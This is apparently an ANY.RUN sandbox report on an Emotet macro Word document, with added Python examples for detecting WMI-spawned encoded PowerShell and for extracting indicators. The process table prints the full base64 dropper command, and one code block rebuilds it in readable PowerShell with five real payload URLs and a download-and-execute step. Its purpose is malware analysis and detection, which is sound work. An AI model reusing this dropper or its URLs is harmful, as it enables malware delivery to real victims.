File name: PLIK_05160232_65368990412.doc
Full analysis: https://app.any.run/tasks/39cede2f-64a2-49c3-8528-e6b6ed72546c
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over its lifetime it has been upgraded into very destructive malware. It mostly targets corporate victims, but private users are also infected through mass spam e-mail campaigns.

Analysis date: June 19, 2019, 09:05:58
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: sky blue Practical Plastic Ball, Subject: Panama, Author: Martin Treutel, Comments: Saint Helena Pound Mountain, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Apr 30 06:41:00 2019, Last Saved Time/Date: Tue Apr 30 06:41:00 2019, Number of Pages: 1, Number of Words: 15, Number of Characters: 90, Security: 0
MD5: 2E1492E29EDCC8BB86D385705CA82D71
SHA1: 1EE4908747B870A220E26C7F98F62940536C3600
SHA256: 4F71011C7945DE55302CB27C6FBB0532518A1C56FA7969EE99FBAEFF5BDF6FC6
SSDEEP: 3072:P77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qurxikSTKqOg1k+v+6:P77HUUUUUUUUUUUUUUUUUUUT52VPxiT/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 3048)
    • PowerShell script executed

      • powershell.exe (PID: 3048)
    • Creates files in the user directory

      • powershell.exe (PID: 3048)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3320)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3320)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
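Detection logic for the process chain these signatures describe, as an added Python example (not ANY.RUN's signatures). The events are constructed: PIDs 3320 and 3048 reproduce the process table of this report (images, parents and command lines, with the base64 argument truncated), while PIDs 4100 and 5120 are made up, a benign interactive PowerShell and the direct WINWORD→powershell spawn that a naive rule expects. The point it shows: because the macro launched PowerShell through WMI, the parent of PID 3048 is wmiprvse.exe rather than WINWORD.EXE, so an "Office spawns a script host" rule never fires on this sample, whereas a rule keyed on wmiprvse.exe as parent, or on the -EncodedCommand argument itself, does. Rule names and the ProcEvent shape are this example's own.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str          # full path or basename of the created process
    cmdline: str
    parent_image: str   # full path or basename of the creating process


# Constructed events. 3320 and 3048 follow the process table of this report
# (the -e argument is cut to its first 52 characters); 4100 and 5120 are made up:
# a benign interactive PowerShell, and the direct Office->PowerShell spawn that
# a parent/child rule on Office expects to see.
EVENTS = [
    ProcEvent(3320, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
              r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n '
              r'"C:\Users\admin\AppData\Local\Temp\PLIK_05160232_65368990412.doc"',
              "explorer.exe"),
    ProcEvent(3048, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -nop -e JABMAEMATQBOAEcAZgAwAHEAPQAnAFEAcwBjAEEANgBsAGMAJwA7",
              "wmiprvse.exe"),
    ProcEvent(4100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -File C:\scripts\backup.ps1", "explorer.exe"),
    ProcEvent(5120, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -nop -w hidden -enc JABMAEMATQBOAEcAZgAwAHEAPQAnAFEAcwBjAEEANgBsAGMAJwA7",
              r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# -EncodedCommand may be abbreviated to an unambiguous prefix (-e, -ec, -en, -enc, ...)
# followed by a base64 blob; requiring 20+ chars keeps a bare "-e" from matching.
ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:c|n|nc|nco\w*)?\s+([A-Za-z0-9+/]{20,}={0,2})", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawns_script_host(ev: ProcEvent) -> bool:
    return basename(ev.parent_image) in OFFICE_APPS and basename(ev.image) in SCRIPT_HOSTS


def wmi_spawns_script_host(ev: ProcEvent) -> bool:
    # A macro calling Win32_Process.Create gets its child parented to the WMI provider host.
    return basename(ev.parent_image) == "wmiprvse.exe" and basename(ev.image) in SCRIPT_HOSTS


def encoded_powershell(ev: ProcEvent) -> bool:
    return basename(ev.image) == "powershell.exe" and ENCODED_ARG.search(ev.cmdline) is not None


RULES = {
    "office_spawns_script_host": office_spawns_script_host,
    "wmi_spawns_script_host": wmi_spawns_script_host,
    "encoded_powershell": encoded_powershell,
}


def evaluate(events):
    """Map PID -> names of the rules that fired; PIDs with no hits are omitted."""
    hits = {}
    for ev in events:
        fired = [name for name, rule in RULES.items() if rule(ev)]
        if fired:
            hits[ev.pid] = fired
    return hits


if __name__ == "__main__":
    for pid, fired in evaluate(EVENTS).items():
        print(pid, ", ".join(fired))
```

Running it, PID 3048 is flagged only by the WMI-parent and encoded-argument rules; the Office-parent rule fires on the made-up PID 5120 and on nothing in the real chain, which is why a detection built solely around WINWORD.EXE as parent misses this document.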
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Manager: Kshlerin
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 104
Paragraphs: 1
Lines: 1
Company: Wisozk - Kling
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 90
Words: 15
Pages: 1
ModifyDate: 2019:05:31 05:41:00
CreateDate: 2019:05:31 05:41:00
(Note: the "File info" summary above reads the same OLE timestamps as Tue Apr 30 06:41:00 2019, so the two metadata parsers disagree; either way these are attacker-supplied document properties, not evidence of when the lure was built.)
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: Saint Helena Pound Mountain
Keywords: -
Author: Martin Treutel
Subject: Panama
Title: sky blue Practical Plastic Ball
CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
No data.
All screenshots are available in the full report
Total processes: 36
Monitored processes: 2
Malicious processes: 0
Suspicious processes: 1

Behavior graph

Nodes (interactive graph in the full report): start, winword.exe (no specs), powershell.exe

Process information

PID: 3320
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\PLIK_05160232_65368990412.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 3048
CMD: powershell -nop -e JABMAEMATQBOAEcAZgAwAHEAPQAnAFEAcwBjAEEANgBsAGMAJwA7ACQAcABNAGEAawBhADMAIAA9ACAAJwA3ADMAMAAnADsAJABKAEsATABuAGoAcwA9ACcARABXAGsAbwBDAHcASQBzACcAOwAkAEoAdQBHAFcAbgBpADUARAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAcABNAGEAawBhADMAKwAnAC4AZQB4AGUAJwA7ACQAagBtAFkAOABWAFoAdQA5AD0AJwBQAHoASQByAHIAWgBsAEMAJwA7ACQAcQBiAEIAVwBwAGEAbgA9ACYAKAAnAG4AZQB3AC0AbwAnACsAJwBiACcAKwAnAGoAJwArACcAZQBjAHQAJwApACAATgBFAHQAYAAuAHcAYABFAEIAYABjAGAAbABpAGUAbgBUADsAJABoAHoAdABFAHIAUAA9ACcAaAB0AHQAcAA6AC8ALwB2AGUAbAB2AGUAdAByAG8AYwBrAGEAcABwAHMALgBjAG8AbQAvAFIAZQBzAG8AdQByAGMAZQBzAC8AcABhAGQAeABCAFgAUQBoAEEAdgAvAEAAaAB0AHQAcAA6AC8ALwB2AGsAcABvAC4AbgBlAHQALwBrAGUAbQBsAHkALgBuAGUAdAAvAHkAdABEAEUAZgBjAEIAeAAvAEAAaAB0AHQAcAA6AC8ALwB3AGEAbABkAGUAbgAtAGcAbQBiAGgALgBjAG8AbQAvADgAdwA2ADgAOAB2AHYAZAA1AG0AXwByAHgAaABpAG0AMwAtADEAMgAzADUANgAvAEAAaAB0AHQAcAA6AC8ALwB3AGUAZwBlAGwAZQByAC4AbgBlAHQALwAzAG4AegB5ADQAdQBmAF8AOABwAGEANQB6AC0AOAA0ADEANwAwAC8AQABoAHQAdABwADoALwAvAHcAaQBjAGsAeQBzAHAAbABhAGMAZQAuAGMAbwBtAC8AbQA0AHoAbwB1AG0AcQB4AGQAXwBqAGkAMwBsADkAMQBrAGgALQAzAC8AJwAuAFMAUABsAGkAdAAoACcAQAAnACkAOwAkAGgAWgBjAFEAbQAzADYAPQAnAGoANABNADAAaQBGAGoANAAnADsAZgBvAHIAZQBhAGMAaAAoACQAdgBpADcAXwBmAHQAagBWACAAaQBuACAAJABoAHoAdABFAHIAUAApAHsAdAByAHkAewAkAHEAYgBCAFcAcABhAG4ALgBEAG8AdwBuAGwATwBBAEQARgBpAGwAZQAoACQAdgBpADcAXwBmAHQAagBWACwAIAAkAEoAdQBHAFcAbgBpADUARAApADsAJABvADUAbQA1AFAAYQBQAE4APQAnAGoASwBGADMARABUAE8ASgAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEoAdQBHAFcAbgBpADUARAApAC4AbABlAG4AZwB0AEgAIAAtAGcAZQAgADIAMgA2ADYANQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AEEAUgB0ACgAJABKAHUARwBXAG4AaQA1AEQAKQA7ACQAYQBEAFMASAA3AEYAMQA9ACcARwBqAFcATwBGAHEAQwAnADsAYgByAGUAYQBrADsAJAByAFcAbwBBAHQAQwA9ACcAUgA2AEwAMwBhAHYANgBVACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAdwBVAFUAWgBrAFMAMQA9ACcAcwB6AFkAUQBzADgAUwA5ACcA
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
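How to turn the -e argument of PID 3048 into indicators, as an added Python example (not ANY.RUN's code). The script embedded in the block is a constructed sample: it has the same structure the recorded argument decodes to (a '@'-joined list of the five payload URLs, a Net.WebClient built from concatenated and backtick-split strings, a download loop, a 22665-byte size check before [Diagnostics.Process]::Start, and a drop path of 730.exe under %USERPROFILE%), with the variable names shortened and the junk assignments between statements dropped. The function names and the regular expressions are this example's own; they are tuned to the tricks this sample uses and are not a general PowerShell parser.

```python
import base64
import re

# Constructed sample. It mirrors what the -e argument recorded for PID 3048 decodes
# to: the same five '@'-joined URLs, the same 22665-byte size gate, the same drop
# name (730.exe under %USERPROFILE%) and the same obfuscation tricks; the variable
# names are shortened and the junk assignments between statements are dropped.
SAMPLE_PS = (
    "$n='730';$drop=$env:userprofile+'\\'+$n+'.exe';"
    "$wc=&('new-o'+'b'+'j'+'ect') NEt`.w`EB`c`lienT;"
    "$urls='http://velvetrockapps.com/Resources/padxBXQhAv/"
    "@http://vkpo.net/kemly.net/ytDEfcBx/"
    "@http://walden-gmbh.com/8w688vvd5m_rxhim3-12356/"
    "@http://wegeler.net/3nzy4uf_8pa5z-84170/"
    "@http://wickysplace.com/m4zoumqxd_ji3l91kh-3/'.SPlit('@');"
    "foreach($u in $urls){try{$wc.DownlOADFile($u, $drop);"
    "If ((.('Get'+'-It'+'em') $drop).lengtH -ge 22665) "
    "{[Diagnostics.Process]::StARt($drop);break}}catch{}}"
)


def encode_command(script: str) -> str:
    """Build what powershell -EncodedCommand expects: base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(arg: str) -> str:
    """Reverse of encode_command; restores '=' padding that log extracts often drop."""
    arg = arg.strip()
    arg += "=" * (-len(arg) % 4)
    return base64.b64decode(arg).decode("utf-16-le")


# ('new-o'+'b'+'j'+'ect')  ->  'new-object'
CONCAT = re.compile(r"\(\s*('[^']*'(?:\s*\+\s*'[^']*')+)\s*\)")


def deobfuscate(script: str) -> str:
    """Undo the two tricks this sample uses; not a general PowerShell parser."""
    # Backticks inside bare words (NEt`.w`EB`c`lienT) escape nothing, so drop them.
    # Lossy for real escapes such as `n or `t, which this sample does not use.
    s = script.replace("`", "")
    while True:  # nested or adjacent concatenations need more than one pass
        s2 = CONCAT.sub(lambda m: "'" + "".join(re.findall(r"'([^']*)'", m.group(1))) + "'", s)
        if s2 == s:
            return s
        s = s2


def extract_iocs(encoded_arg: str) -> dict:
    """Decode, normalise, and pull out what an analyst wants to block or hunt for."""
    clean = deobfuscate(decode_command(encoded_arg))
    url_list = re.search(r"'(https?://[^']*)'\.split\('@'\)", clean, re.I)
    gate = re.search(r"\.length\s+-ge\s+(\d+)", clean, re.I)
    return {
        "urls": url_list.group(1).split("@") if url_list else [],
        "min_size": int(gate.group(1)) if gate else None,
        # cmdlets that were hidden behind string concatenation (&'...' / .'...')
        "hidden_cmdlets": sorted({c.lower() for c in re.findall(r"[&.]'([A-Za-z][\w-]*)'", clean)}),
        "uses_webclient": re.search(r"net\.webclient", clean, re.I) is not None,
        "executes_download": re.search(r"Diagnostics\.Process\]::start", clean, re.I) is not None,
    }


def gate_passed(min_size: int, response_bytes: int) -> bool:
    """The size check the script applies before starting the downloaded file."""
    return response_bytes >= min_size


if __name__ == "__main__":
    iocs = extract_iocs(encode_command(SAMPLE_PS))
    for key, value in iocs.items():
        print(f"{key}: {value}")
    # The only 200 response in this report (wegeler.net) was 4.56 Kb of HTML.
    print("would run:", gate_passed(iocs["min_size"], int(4.56 * 1024)))
```

Feeding the real argument from the process table to extract_iocs gives the same five URLs in the same order. Applying the extracted gate to the HTTP table explains the verdict: the one 200 response (wegeler.net, 4.56 Kb of HTML) is far below 22665 bytes, so the script wrote it to 730.exe but never reached [Diagnostics.Process]::Start, which is consistent with "Malicious processes: 0" and with the unhashed 730.exe in the dropped-files list.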
Total events: 1 346
Read events: 882
Write events: 0
Delete events: 0

Modification events

No data
Executable files: 0
Suspicious files: 2
Text files: 0
Unknown types: 9

Dropped files

PID | Process | Filename | Type
3320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRED6A.tmp.cvr | -
  MD5: - | SHA256: -
3048 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GTBY3K4025AOAXCMI6OH.temp | -
  MD5: - | SHA256: -
3048 | powershell.exe | C:\Users\admin\730.exe | -
  MD5: - | SHA256: -
3320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DC13263A.wmf | wmf
  MD5: DEC2C7B08391264D99CFB9918D847759 | SHA256: 13819DAC13DCEBC910997DFEEB7CFAA4EC151E806F93336A16201F61FB5238D9
3320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$IK_05160232_65368990412.doc | pgc
  MD5: 302AEEA5ED0F67994536D79AB1D6D8DD | SHA256: D6D5EFE782EEC840038A7BA9A93D57D472E2114BAB1A4348D40FA4FEF742C1A4
3320 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc
  MD5: 59B915F43B43901FA79C60151EA8042C | SHA256: 836805470EEA2E00AAEE4008E313688C272B90045958CE36BDA26A66D9A0F169
3320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BCDC7B7.wmf | wmf
  MD5: 366EEC002277438643941C1F1B8B6DF3 | SHA256: D8C700368C8517D5795A595E25B77292A1AC04B6296CF194779311ABCAAACE6C
3320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67E50E4C.wmf | wmf
  MD5: 8EF10F8C7F075617CB1B6DAFA3544D32 | SHA256: 27586763A61028672DAA57A7BFEDFE63EE4986613E70EBB7A82AD2609459D1C0
3320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EFC001DD.wmf | wmf
  MD5: DEBCBB01CB4C4383BC46130D8BD99B23 | SHA256: BD19E22BFC817261EEFBA5C4F67E4BCDC7A94E22EBD8D847D8342D029DE45F16
3320 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3A41FD01.wmf | wmf
  MD5: 3F6494A5A1B2A13FDE0F28FD7D32FF6D | SHA256: E9A909E0EF1468A104B48EDE9D053AC1BD16944D55977E29DA28A39BF774E6E9
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 4
TCP/UDP connections: 5
DNS requests: 6
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
3048 | powershell.exe | GET | 403 | 209.87.151.179:80 | http://wickysplace.com/m4zoumqxd_ji3l91kh-3/ | US | html | 411 b | unknown
3048 | powershell.exe | GET | 404 | 81.169.145.95:80 | http://walden-gmbh.com/8w688vvd5m_rxhim3-12356/ | DE | html | 222 b | malicious
3048 | powershell.exe | GET | 200 | 81.169.145.159:80 | http://wegeler.net/3nzy4uf_8pa5z-84170/ | DE | html | 4.56 Kb | malicious
3048 | powershell.exe | GET | 404 | 149.255.62.37:80 | http://velvetrockapps.com/Resources/padxBXQhAv/ | GB | html | 964 b | suspicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3048 | powershell.exe | 81.169.145.95:80 | walden-gmbh.com | Strato AG | DE | malicious
3048 | powershell.exe | 209.87.151.179:80 | wickysplace.com | Beyond Hosting, LLC | US | unknown
3048 | powershell.exe | 23.231.4.21:80 | vkpo.net | Eonix Corporation | US | suspicious
3048 | powershell.exe | 149.255.62.37:80 | velvetrockapps.com | Awareness Software Limited | GB | suspicious
3048 | powershell.exe | 81.169.145.159:80 | wegeler.net | Strato AG | DE | malicious

Note: vkpo.net (23.231.4.21) was resolved and a TCP connection was opened to it, but no HTTP request to it appears in the table above; the only 200 response came from wegeler.net.

DNS requests

Domain | IP | Reputation
velvetrockapps.com | 149.255.62.37 | suspicious
vkpo.net | 23.231.4.21 | suspicious
walden-gmbh.com | 81.169.145.95 | malicious
wegeler.net | 81.169.145.159 | malicious
wickysplace.com | 209.87.151.179 | unknown

Threats

No threats detected
No debug info